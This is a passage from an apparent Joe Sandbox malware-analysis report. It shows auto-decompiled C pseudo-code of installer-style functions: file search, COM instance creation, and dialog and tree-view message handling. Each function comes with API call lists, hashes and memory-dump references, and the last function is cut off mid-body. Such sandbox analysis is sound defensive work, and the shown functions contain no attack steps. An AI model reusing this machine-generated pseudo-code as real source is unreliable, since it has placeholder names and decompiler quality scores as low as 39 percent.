                                                                                              APIs
                                                                                              • CoCreateInstance.OLE32(004084E4,?,00000001,004084D4,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402229
                                                                                              Strings
                                                                                              • C:\Users\user\AppData\Local\Temp, xrefs: 00402269
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.319378682.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.319372400.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319385831.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319392752.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319392752.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319392752.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319392752.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319392752.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319466753.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                              Similarity
                                                                                              • API ID: CreateInstance
                                                                                              • String ID: C:\Users\user\AppData\Local\Temp
                                                                                              • API String ID: 542301482-47812868
                                                                                              • Opcode ID: 077b7362f6a1d4038be91bf7f4b9e5842d68daf9de23732b557fb751e09ce78c
                                                                                              • Instruction ID: f110e38d5ccd8909b9e85e2ea6b1342c5fae2602ce40754bea02e3b472428d32
                                                                                              • Opcode Fuzzy Hash: 077b7362f6a1d4038be91bf7f4b9e5842d68daf9de23732b557fb751e09ce78c
                                                                                              • Instruction Fuzzy Hash: BC411771A00209EFCF40DFE4C989E9D7BB5BF49304B20456AF505EB2D1DB799981CB94
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0040290B Relevance: 1.5, APIs: 1, Instructions: 30fileCOMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 39%
                                                                                              			E0040290B(short __ebx, short* __edi) {
				void* _t21;

				if(FindFirstFileW(E00402DA6(2), _t21 - 0x2dc) != 0xffffffff) {
					E004065AF( *((intOrPtr*)(_t21 - 0xc)), _t8);
					_push(_t21 - 0x2b0);
					_push(__edi);
					E00406668();
				} else {
					 *((short*)( *((intOrPtr*)(_t21 - 0xc)))) = __ebx;
					 *__edi = __ebx;
					 *((intOrPtr*)(_t21 - 4)) = 1;
				}
				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t21 - 4));
				return 0;
			}




                                                                                              0x00402923
                                                                                              0x0040293e
                                                                                              0x00402949
                                                                                              0x0040294a
                                                                                              0x00402a94
                                                                                              0x00402925
                                                                                              0x00402928
                                                                                              0x0040292b
                                                                                              0x0040292e
                                                                                              0x0040292e
                                                                                              0x00402c2d
                                                                                              0x00402c39

                                                                                              APIs
                                                                                              • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 0040291A
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.319378682.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.319372400.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319385831.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319392752.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319392752.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319392752.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319392752.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319392752.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319466753.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                              Similarity
                                                                                              • API ID: FileFindFirst
                                                                                              • String ID:
                                                                                              • API String ID: 1974802433-0
                                                                                              • Opcode ID: b2f27a8a5f9b700f187602bb898c1293859530a573ae52e9df8ecc114fa703e5
                                                                                              • Instruction ID: b84bdfeecc4e8c0803ac0e71b8711fc90ef1d688bdc4be786e729a17b55638d3
                                                                                              • Opcode Fuzzy Hash: b2f27a8a5f9b700f187602bb898c1293859530a573ae52e9df8ecc114fa703e5
                                                                                              • Instruction Fuzzy Hash: 47F05E71A04105EBDB01DBB4EE49AAEB378EF14314F60457BE101F21D0E7B88E529B29
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00405031 Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 489windowmemoryCOMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 96%
                                                                                              			E00405031(struct HWND__* _a4, int _a8, signed int _a12, int _a16) {
				struct HWND__* _v8;
				struct HWND__* _v12;
				long _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				signed char* _v32;
				int _v36;
				signed int _v44;
				int _v48;
				signed int* _v60;
				signed char* _v64;
				signed int _v68;
				long _v72;
				void* _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				void* _v88;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t198;
				intOrPtr _t201;
				long _t207;
				signed int _t211;
				signed int _t222;
				void* _t225;
				void* _t226;
				int _t232;
				long _t237;
				long _t238;
				signed int _t239;
				signed int _t245;
				signed int _t247;
				signed char _t248;
				signed char _t254;
				void* _t258;
				void* _t260;
				signed char* _t278;
				signed char _t279;
				long _t284;
				struct HWND__* _t291;
				signed int* _t292;
				int _t293;
				long _t294;
				signed int _t295;
				void* _t297;
				long _t298;
				int _t299;
				signed int _t300;
				signed int _t303;
				signed int _t311;
				signed char* _t319;
				int _t324;
				void* _t326;

				_t291 = _a4;
				_v12 = GetDlgItem(_t291, 0x3f9);
				_v8 = GetDlgItem(_t291, 0x408);
				_t326 = SendMessageW;
				_v24 =  *0x42a288;
				_v28 =  *0x42a270 + 0x94;
				if(_a8 != 0x110) {
					L23:
					if(_a8 != 0x405) {
						_t301 = _a16;
					} else {
						_a12 = 0;
						_t301 = 1;
						_a8 = 0x40f;
						_a16 = 1;
					}
					if(_a8 == 0x4e || _a8 == 0x413) {
						_v16 = _t301;
						if(_a8 == 0x413 ||  *((intOrPtr*)(_t301 + 4)) == 0x408) {
							if(( *0x42a279 & 0x00000002) != 0) {
								L41:
								if(_v16 != 0) {
									_t237 = _v16;
									if( *((intOrPtr*)(_t237 + 8)) == 0xfffffe3d) {
										SendMessageW(_v8, 0x419, 0,  *(_t237 + 0x5c));
									}
									_t238 = _v16;
									if( *((intOrPtr*)(_t238 + 8)) == 0xfffffe39) {
										_t301 = _v24;
										_t239 =  *(_t238 + 0x5c);
										if( *((intOrPtr*)(_t238 + 0xc)) != 2) {
											 *(_t239 * 0x818 + _t301 + 8) =  *(_t239 * 0x818 + _t301 + 8) & 0xffffffdf;
										} else {
											 *(_t239 * 0x818 + _t301 + 8) =  *(_t239 * 0x818 + _t301 + 8) | 0x00000020;
										}
									}
								}
								goto L48;
							}
							if(_a8 == 0x413) {
								L33:
								_t301 = 0 | _a8 != 0x00000413;
								_t245 = E00404F7F(_v8, _a8 != 0x413);
								_t295 = _t245;
								if(_t295 >= 0) {
									_t94 = _v24 + 8; // 0x8
									_t301 = _t245 * 0x818 + _t94;
									_t247 =  *_t301;
									if((_t247 & 0x00000010) == 0) {
										if((_t247 & 0x00000040) == 0) {
											_t248 = _t247 ^ 0x00000001;
										} else {
											_t254 = _t247 ^ 0x00000080;
											if(_t254 >= 0) {
												_t248 = _t254 & 0x000000fe;
											} else {
												_t248 = _t254 | 0x00000001;
											}
										}
										 *_t301 = _t248;
										E0040117D(_t295);
										_a12 = _t295 + 1;
										_a16 =  !( *0x42a278) >> 0x00000008 & 0x00000001;
										_a8 = 0x40f;
									}
								}
								goto L41;
							}
							_t301 = _a16;
							if( *((intOrPtr*)(_a16 + 8)) != 0xfffffffe) {
								goto L41;
							}
							goto L33;
						} else {
							goto L48;
						}
					} else {
						L48:
						if(_a8 != 0x111) {
							L56:
							if(_a8 == 0x200) {
								SendMessageW(_v8, 0x200, 0, 0);
							}
							if(_a8 == 0x40b) {
								_t225 =  *0x42372c;
								if(_t225 != 0) {
									ImageList_Destroy(_t225);
								}
								_t226 =  *0x423740;
								if(_t226 != 0) {
									GlobalFree(_t226);
								}
								 *0x42372c = 0;
								 *0x423740 = 0;
								 *0x42a2c0 = 0;
							}
							if(_a8 != 0x40f) {
								L90:
								if(_a8 == 0x420 && ( *0x42a279 & 0x00000001) != 0) {
									_t324 = (0 | _a16 == 0x00000020) << 3;
									ShowWindow(_v8, _t324);
									ShowWindow(GetDlgItem(_a4, 0x3fe), _t324);
								}
								goto L93;
							} else {
								E004011EF(_t301, 0, 0);
								_t198 = _a12;
								if(_t198 != 0) {
									if(_t198 != 0xffffffff) {
										_t198 = _t198 - 1;
									}
									_push(_t198);
									_push(8);
									E00404FFF();
								}
								if(_a16 == 0) {
									L75:
									E004011EF(_t301, 0, 0);
									_v36 =  *0x423740;
									_t201 =  *0x42a288;
									_v64 = 0xf030;
									_v24 = 0;
									if( *0x42a28c <= 0) {
										L86:
										if( *0x42a31e == 0x400) {
											InvalidateRect(_v8, 0, 1);
										}
										if( *((intOrPtr*)( *0x42923c + 0x10)) != 0) {
											E00404F3A(0x3ff, 0xfffffffb, E00404F52(5));
										}
										goto L90;
									}
									_t292 = _t201 + 8;
									do {
										_t207 =  *((intOrPtr*)(_v36 + _v24 * 4));
										if(_t207 != 0) {
											_t303 =  *_t292;
											_v72 = _t207;
											_v76 = 8;
											if((_t303 & 0x00000001) != 0) {
												_v76 = 9;
												_v60 =  &(_t292[4]);
												_t292[0] = _t292[0] & 0x000000fe;
											}
											if((_t303 & 0x00000040) == 0) {
												_t211 = (_t303 & 0x00000001) + 1;
												if((_t303 & 0x00000010) != 0) {
													_t211 = _t211 + 3;
												}
											} else {
												_t211 = 3;
											}
											_v68 = (_t211 << 0x0000000b | _t303 & 0x00000008) + (_t211 << 0x0000000b | _t303 & 0x00000008) | _t303 & 0x00000020;
											SendMessageW(_v8, 0x1102, (_t303 >> 0x00000005 & 0x00000001) + 1, _v72);
											SendMessageW(_v8, 0x113f, 0,  &_v76);
										}
										_v24 = _v24 + 1;
										_t292 =  &(_t292[0x206]);
									} while (_v24 <  *0x42a28c);
									goto L86;
								} else {
									_t293 = E004012E2( *0x423740);
									E00401299(_t293);
									_t222 = 0;
									_t301 = 0;
									if(_t293 <= 0) {
										L74:
										SendMessageW(_v12, 0x14e, _t301, 0);
										_a16 = _t293;
										_a8 = 0x420;
										goto L75;
									} else {
										goto L71;
									}
									do {
										L71:
										if( *((intOrPtr*)(_v28 + _t222 * 4)) != 0) {
											_t301 = _t301 + 1;
										}
										_t222 = _t222 + 1;
									} while (_t222 < _t293);
									goto L74;
								}
							}
						}
						if(_a12 != 0x3f9 || _a12 >> 0x10 != 1) {
							goto L93;
						} else {
							_t232 = SendMessageW(_v12, 0x147, 0, 0);
							if(_t232 == 0xffffffff) {
								goto L93;
							}
							_t294 = SendMessageW(_v12, 0x150, _t232, 0);
							if(_t294 == 0xffffffff ||  *((intOrPtr*)(_v28 + _t294 * 4)) == 0) {
								_t294 = 0x20;
							}
							E00401299(_t294);
							SendMessageW(_a4, 0x420, 0, _t294);
							_a12 = _a12 | 0xffffffff;
							_a16 = 0;
							_a8 = 0x40f;
							goto L56;
						}
					}
				} else {
					_v36 = 0;
					_v20 = 2;
					 *0x42a2c0 = _t291;
					 *0x423740 = GlobalAlloc(0x40,  *0x42a28c << 2);
					_t258 = LoadImageW( *0x42a260, 0x6e, 0, 0, 0, 0);
					 *0x423734 =  *0x423734 | 0xffffffff;
					_t297 = _t258;
					 *0x42373c = SetWindowLongW(_v8, 0xfffffffc, E0040563E);
					_t260 = ImageList_Create(0x10, 0x10, 0x21, 6, 0);
					 *0x42372c = _t260;
					ImageList_AddMasked(_t260, _t297, 0xff00ff);
					SendMessageW(_v8, 0x1109, 2,  *0x42372c);
					if(SendMessageW(_v8, 0x111c, 0, 0) < 0x10) {
						SendMessageW(_v8, 0x111b, 0x10, 0);
					}
					DeleteObject(_t297);
					_t298 = 0;
					do {
						_t266 =  *((intOrPtr*)(_v28 + _t298 * 4));
						if( *((intOrPtr*)(_v28 + _t298 * 4)) != 0) {
							if(_t298 != 0x20) {
								_v20 = 0;
							}
							SendMessageW(_v12, 0x151, SendMessageW(_v12, 0x143, 0, E004066A5(_t298, 0, _t326, 0, _t266)), _t298);
						}
						_t298 = _t298 + 1;
					} while (_t298 < 0x21);
					_t299 = _a16;
					_push( *((intOrPtr*)(_t299 + 0x30 + _v20 * 4)));
					_push(0x15);
					E004045C4(_a4);
					_push( *((intOrPtr*)(_t299 + 0x34 + _v20 * 4)));
					_push(0x16);
					E004045C4(_a4);
					_t300 = 0;
					_v16 = 0;
					if( *0x42a28c <= 0) {
						L19:
						SetWindowLongW(_v8, 0xfffffff0, GetWindowLongW(_v8, 0xfffffff0) & 0x000000fb);
						goto L20;
					} else {
						_t319 = _v24 + 8;
						_v32 = _t319;
						do {
							_t278 =  &(_t319[0x10]);
							if( *_t278 != 0) {
								_v64 = _t278;
								_t279 =  *_t319;
								_v88 = _v16;
								_t311 = 0x20;
								_v84 = 0xffff0002;
								_v80 = 0xd;
								_v68 = _t311;
								_v44 = _t300;
								_v72 = _t279 & _t311;
								if((_t279 & 0x00000002) == 0) {
									if((_t279 & 0x00000004) == 0) {
										 *( *0x423740 + _t300 * 4) = SendMessageW(_v8, 0x1132, 0,  &_v88);
									} else {
										_v16 = SendMessageW(_v8, 0x110a, 3, _v16);
									}
								} else {
									_v80 = 0x4d;
									_v48 = 1;
									_t284 = SendMessageW(_v8, 0x1132, 0,  &_v88);
									_v36 = 1;
									 *( *0x423740 + _t300 * 4) = _t284;
									_v16 =  *( *0x423740 + _t300 * 4);
								}
							}
							_t300 = _t300 + 1;
							_t319 =  &(_v32[0x818]);
							_v32 = _t319;
						} while (_t300 <  *0x42a28c);
						if(_v36 != 0) {
							L20:
							if(_v20 != 0) {
								E004045F9(_v8);
								goto L23;
							} else {
								ShowWindow(_v12, 5);
								E004045F9(_v12);
								L93:
								return E0040462B(_a8, _a12, _a16);
							}
						}
						goto L19;
					}
				}
			}


























































                                                                                              0x00405038
                                                                                              0x00405051
                                                                                              0x00405056
                                                                                              0x0040505e
                                                                                              0x00405064
                                                                                              0x0040507a
                                                                                              0x0040507d
                                                                                              0x004052a8
                                                                                              0x004052af
                                                                                              0x004052c3
                                                                                              0x004052b1
                                                                                              0x004052b3
                                                                                              0x004052b6
                                                                                              0x004052b7
                                                                                              0x004052be
                                                                                              0x004052be
                                                                                              0x004052cf
                                                                                              0x004052dd
                                                                                              0x004052e0
                                                                                              0x004052f6
                                                                                              0x0040536b
                                                                                              0x0040536e
                                                                                              0x00405370
                                                                                              0x0040537a
                                                                                              0x00405388
                                                                                              0x00405388
                                                                                              0x0040538a
                                                                                              0x00405394
                                                                                              0x0040539a
                                                                                              0x0040539d
                                                                                              0x004053a0
                                                                                              0x004053bb
                                                                                              0x004053a2
                                                                                              0x004053ac
                                                                                              0x004053ac
                                                                                              0x004053a0
                                                                                              0x00405394
                                                                                              0x00000000
                                                                                              0x0040536e
                                                                                              0x004052fb
                                                                                              0x00405306
                                                                                              0x0040530b
                                                                                              0x00405312
                                                                                              0x00405317
                                                                                              0x0040531b
                                                                                              0x00405326
                                                                                              0x00405326
                                                                                              0x0040532a
                                                                                              0x0040532e
                                                                                              0x00405332
                                                                                              0x00405345
                                                                                              0x00405334
                                                                                              0x00405334
                                                                                              0x0040533b
                                                                                              0x00405341
                                                                                              0x0040533d
                                                                                              0x0040533d
                                                                                              0x0040533d
                                                                                              0x0040533b
                                                                                              0x00405349
                                                                                              0x0040534b
                                                                                              0x0040535e
                                                                                              0x00405361
                                                                                              0x00405364
                                                                                              0x00405364
                                                                                              0x0040532e
                                                                                              0x00000000
                                                                                              0x0040531b
                                                                                              0x004052fd
                                                                                              0x00405304
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x004053be
                                                                                              0x004053be
                                                                                              0x004053c5
                                                                                              0x00405436
                                                                                              0x0040543e
                                                                                              0x00405446
                                                                                              0x00405446
                                                                                              0x0040544f
                                                                                              0x00405451
                                                                                              0x00405458
                                                                                              0x0040545b
                                                                                              0x0040545b
                                                                                              0x00405461
                                                                                              0x00405468
                                                                                              0x0040546b
                                                                                              0x0040546b
                                                                                              0x00405471
                                                                                              0x00405477
                                                                                              0x0040547d
                                                                                              0x0040547d
                                                                                              0x0040548a
                                                                                              0x004055eb
                                                                                              0x004055f2
                                                                                              0x0040560f
                                                                                              0x00405615
                                                                                              0x00405627
                                                                                              0x00405627
                                                                                              0x00000000
                                                                                              0x00405490
                                                                                              0x00405492
                                                                                              0x00405497
                                                                                              0x0040549c
                                                                                              0x004054a1
                                                                                              0x004054a3
                                                                                              0x004054a3
                                                                                              0x004054a4
                                                                                              0x004054a5
                                                                                              0x004054a7
                                                                                              0x004054a7
                                                                                              0x004054af
                                                                                              0x004054f0
                                                                                              0x004054f2
                                                                                              0x00405502
                                                                                              0x00405505
                                                                                              0x0040550a
                                                                                              0x00405511
                                                                                              0x00405514
                                                                                              0x004055b6
                                                                                              0x004055bf
                                                                                              0x004055c7
                                                                                              0x004055c7
                                                                                              0x004055d5
                                                                                              0x004055e6
                                                                                              0x004055e6
                                                                                              0x00000000
                                                                                              0x004055d5
                                                                                              0x0040551a
                                                                                              0x0040551d
                                                                                              0x00405523
                                                                                              0x00405528
                                                                                              0x0040552a
                                                                                              0x0040552c
                                                                                              0x00405532
                                                                                              0x00405539
                                                                                              0x0040553e
                                                                                              0x00405545
                                                                                              0x00405548
                                                                                              0x00405548
                                                                                              0x0040554f
                                                                                              0x0040555b
                                                                                              0x0040555f
                                                                                              0x00405561
                                                                                              0x00405561
                                                                                              0x00405551
                                                                                              0x00405553
                                                                                              0x00405553
                                                                                              0x00405581
                                                                                              0x0040558d
                                                                                              0x0040559c
                                                                                              0x0040559c
                                                                                              0x0040559e
                                                                                              0x004055a1
                                                                                              0x004055aa
                                                                                              0x00000000
                                                                                              0x004054b1
                                                                                              0x004054bc
                                                                                              0x004054bf
                                                                                              0x004054c4
                                                                                              0x004054c6
                                                                                              0x004054ca
                                                                                              0x004054da
                                                                                              0x004054e4
                                                                                              0x004054e6
                                                                                              0x004054e9
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x004054cc
                                                                                              0x004054cc
                                                                                              0x004054d2
                                                                                              0x004054d4
                                                                                              0x004054d4
                                                                                              0x004054d5
                                                                                              0x004054d6
                                                                                              0x00000000
                                                                                              0x004054cc
                                                                                              0x004054af
                                                                                              0x0040548a
                                                                                              0x004053cd
                                                                                              0x00000000
                                                                                              0x004053e3
                                                                                              0x004053ed
                                                                                              0x004053f2
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00405404
                                                                                              0x00405409
                                                                                              0x00405415
                                                                                              0x00405415
                                                                                              0x00405417
                                                                                              0x00405426
                                                                                              0x00405428
                                                                                              0x0040542c
                                                                                              0x0040542f
                                                                                              0x00000000
                                                                                              0x0040542f
                                                                                              0x004053cd
                                                                                              0x00405083
                                                                                              0x00405088
                                                                                              0x00405091
                                                                                              0x00405098
                                                                                              0x004050aa
                                                                                              0x004050b5
                                                                                              0x004050bb
                                                                                              0x004050c9
                                                                                              0x004050dd
                                                                                              0x004050e2
                                                                                              0x004050ef
                                                                                              0x004050f4
                                                                                              0x0040510a
                                                                                              0x0040511b
                                                                                              0x00405128
                                                                                              0x00405128
                                                                                              0x0040512b
                                                                                              0x00405131
                                                                                              0x00405133
                                                                                              0x00405136
                                                                                              0x0040513b
                                                                                              0x00405140
                                                                                              0x00405142
                                                                                              0x00405142
                                                                                              0x00405162
                                                                                              0x00405162
                                                                                              0x00405164
                                                                                              0x00405165
                                                                                              0x0040516a
                                                                                              0x00405170
                                                                                              0x00405174
                                                                                              0x00405179
                                                                                              0x00405181
                                                                                              0x00405185
                                                                                              0x0040518a
                                                                                              0x0040518f
                                                                                              0x00405197
                                                                                              0x0040519a
                                                                                              0x0040526a
                                                                                              0x0040527d
                                                                                              0x00000000
                                                                                              0x004051a0
                                                                                              0x004051a3
                                                                                              0x004051a6
                                                                                              0x004051a9
                                                                                              0x004051a9
                                                                                              0x004051af
                                                                                              0x004051b8
                                                                                              0x004051bb
                                                                                              0x004051bf
                                                                                              0x004051c2
                                                                                              0x004051c5
                                                                                              0x004051ce
                                                                                              0x004051d7
                                                                                              0x004051da
                                                                                              0x004051dd
                                                                                              0x004051e0
                                                                                              0x0040521e
                                                                                              0x00405249
                                                                                              0x00405220
                                                                                              0x0040522f
                                                                                              0x0040522f
                                                                                              0x004051e2
                                                                                              0x004051e5
                                                                                              0x004051f3
                                                                                              0x004051fd
                                                                                              0x00405205
                                                                                              0x0040520c
                                                                                              0x00405217
                                                                                              0x00405217
                                                                                              0x004051e0
                                                                                              0x0040524f
                                                                                              0x00405250
                                                                                              0x0040525c
                                                                                              0x0040525c
                                                                                              0x00405268
                                                                                              0x00405283
                                                                                              0x00405286
                                                                                              0x004052a3
                                                                                              0x00000000
                                                                                              0x00405288
                                                                                              0x0040528d
                                                                                              0x00405296
                                                                                              0x00405629
                                                                                              0x0040563b
                                                                                              0x0040563b
                                                                                              0x00405286
                                                                                              0x00000000
                                                                                              0x00405268
                                                                                              0x0040519a

                                                                                              APIs
                                                                                              • GetDlgItem.USER32 ref: 00405049
                                                                                              • GetDlgItem.USER32 ref: 00405054
                                                                                              • GlobalAlloc.KERNEL32(00000040,?), ref: 0040509E
                                                                                              • LoadImageW.USER32 ref: 004050B5
                                                                                              • SetWindowLongW.USER32 ref: 004050CE
                                                                                              • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 004050E2
                                                                                              • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 004050F4
                                                                                              • SendMessageW.USER32(?,00001109,00000002), ref: 0040510A
                                                                                              • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00405116
                                                                                              • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00405128
                                                                                              • DeleteObject.GDI32(00000000), ref: 0040512B
                                                                                              • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00405156
                                                                                              • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00405162
                                                                                              • SendMessageW.USER32(?,00001132,00000000,?), ref: 004051FD
                                                                                              • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 0040522D
                                                                                                • Part of subcall function 004045F9: SendMessageW.USER32(00000028,?,00000001,00404424), ref: 00404607
                                                                                              • SendMessageW.USER32(?,00001132,00000000,?), ref: 00405241
                                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 0040526F
                                                                                              • SetWindowLongW.USER32 ref: 0040527D
                                                                                              • ShowWindow.USER32(?,00000005), ref: 0040528D
                                                                                              • SendMessageW.USER32(?,00000419,00000000,?), ref: 00405388
                                                                                              • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 004053ED
                                                                                              • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00405402
                                                                                              • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00405426
                                                                                              • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00405446
                                                                                              • ImageList_Destroy.COMCTL32(?), ref: 0040545B
                                                                                              • GlobalFree.KERNEL32 ref: 0040546B
                                                                                              • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004054E4
                                                                                              • SendMessageW.USER32(?,00001102,?,?), ref: 0040558D
                                                                                              • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 0040559C
                                                                                              • InvalidateRect.USER32(?,00000000,00000001), ref: 004055C7
                                                                                              • ShowWindow.USER32(?,00000000), ref: 00405615
                                                                                              • GetDlgItem.USER32 ref: 00405620
                                                                                              • ShowWindow.USER32(00000000), ref: 00405627
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.319378682.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.319372400.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319385831.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319392752.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319392752.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319392752.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319392752.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319392752.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319466753.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                              • String ID: $M$N
                                                                                              • API String ID: 2564846305-813528018
                                                                                              • Opcode ID: de07a9e9a0be4199ac2fb0f6085adc1098bb242521470954e30eab12cbe79057
                                                                                              • Instruction ID: a1eb65f7683e17450fca8d4cb4c1055b074660be5b1b810df034ff690b7f681c
                                                                                              • Opcode Fuzzy Hash: de07a9e9a0be4199ac2fb0f6085adc1098bb242521470954e30eab12cbe79057
                                                                                              • Instruction Fuzzy Hash: 2A025CB0900609EFDF20DF65CD45AAE7BB5FB44315F10817AEA10BA2E1D7798A52CF18
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00404783 Relevance: 37.0, APIs: 19, Strings: 2, Instructions: 204windowstringCOMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 91%
                                                                                              			E00404783(struct HWND__* _a4, int _a8, unsigned int _a12, WCHAR* _a16) {
				intOrPtr _v8;
				int _v12;
				void* _v16;
				struct HWND__* _t56;
				signed int _t75;
				signed short* _t76;
				signed short* _t78;
				long _t92;
				int _t103;
				signed int _t110;
				intOrPtr _t113;
				WCHAR* _t114;
				signed int* _t116;
				WCHAR* _t117;
				struct HWND__* _t118;

				if(_a8 != 0x110) {
					if(_a8 != 0x111) {
						L13:
						if(_a8 != 0x4e) {
							if(_a8 == 0x40b) {
								 *0x421714 =  *0x421714 + 1;
							}
							L27:
							_t114 = _a16;
							L28:
							return E0040462B(_a8, _a12, _t114);
						}
						_t56 = GetDlgItem(_a4, 0x3e8);
						_t114 = _a16;
						if( *((intOrPtr*)(_t114 + 8)) == 0x70b &&  *((intOrPtr*)(_t114 + 0xc)) == 0x201) {
							_t103 =  *((intOrPtr*)(_t114 + 0x1c));
							_t113 =  *((intOrPtr*)(_t114 + 0x18));
							_v12 = _t103;
							_v16 = _t113;
							_v8 = 0x428200;
							if(_t103 - _t113 < 0x800) {
								SendMessageW(_t56, 0x44b, 0,  &_v16);
								SetCursor(LoadCursorW(0, 0x7f02));
								_push(1);
								E00404A32(_a4, _v8);
								SetCursor(LoadCursorW(0, 0x7f00));
								_t114 = _a16;
							}
						}
						if( *((intOrPtr*)(_t114 + 8)) != 0x700 ||  *((intOrPtr*)(_t114 + 0xc)) != 0x100) {
							goto L28;
						} else {
							if( *((intOrPtr*)(_t114 + 0x10)) == 0xd) {
								SendMessageW( *0x42a268, 0x111, 1, 0);
							}
							if( *((intOrPtr*)(_t114 + 0x10)) == 0x1b) {
								SendMessageW( *0x42a268, 0x10, 0, 0);
							}
							return 1;
						}
					}
					if(_a12 >> 0x10 != 0 ||  *0x421714 != 0) {
						goto L27;
					} else {
						_t116 =  *0x422720 + 0x14;
						if(( *_t116 & 0x00000020) == 0) {
							goto L27;
						}
						 *_t116 =  *_t116 & 0xfffffffe | SendMessageW(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001;
						E004045E6(SendMessageW(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001);
						E00404A0E();
						goto L13;
					}
				}
				_t117 = _a16;
				_t75 =  *(_t117 + 0x30);
				if(_t75 < 0) {
					_t75 =  *( *0x42923c - 4 + _t75 * 4);
				}
				_t76 =  *0x42a298 + _t75 * 2;
				_t110 =  *_t76 & 0x0000ffff;
				_a8 = _t110;
				_t78 =  &(_t76[1]);
				_a16 = _t78;
				_v16 = _t78;
				_v12 = 0;
				_v8 = E00404734;
				if(_t110 != 2) {
					_v8 = E004046FA;
				}
				_push( *((intOrPtr*)(_t117 + 0x34)));
				_push(0x22);
				E004045C4(_a4);
